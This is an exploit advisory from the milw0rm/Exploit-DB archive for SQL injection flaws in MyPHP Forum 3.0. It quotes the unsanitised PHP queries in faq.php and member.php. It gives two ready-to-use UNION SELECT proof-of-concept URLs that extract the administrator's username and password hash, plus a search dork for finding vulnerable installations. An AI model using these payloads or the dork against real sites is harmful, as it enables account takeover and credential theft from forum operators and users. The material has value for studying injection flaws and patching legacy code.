MyPHP Forum 3.0 (Final) - Multiple SQL Injections

EDB-ID:

4822


Author:

x0kster

Type:

webapps


Platform:

PHP

Date:

2007-12-31


Name            :  MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability
Author          :  x0kster
Email           :  x0kster@gmail.com
Site            :  ihteam.net
Script Download :  http://www.myphp.ws/
Date            :  31/12/2007
Dork            :  "Powered by: MyPHP Forum"

Note: 
For work, magic_quotes_gpc must be turned off on the server.
Usally the table prefix is 'nb'.



Sql injection in faq.php

   <?php
    //faq.php
    [...]
    $id = $_GET['id'];
    if($action == "view" && !empty($id)) {
	$result = mysql_query("SELECT * from $db_faq WHERE id='$id'") or die(mysql_error()); // <-- So miss a control :-D
	$row = mysql_fetch_array($result);
	$row[answer] = postify($row[answer]);
    [...]
   ?>

So we can execute an sql injection thrught the bugged variable $id.

PoC:

http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*




Sql injection in member.php

   <?php
    //member.php
   [...]
    if($action == "viewpro") {
	$member = $HTTP_GET_VARS['member'];
	$query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die(mysql_error());
   [...]
   ?>

So $member variable isn't controlled so we can exploit it.

PoC:

http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*

# milw0rm.com [2007-12-31]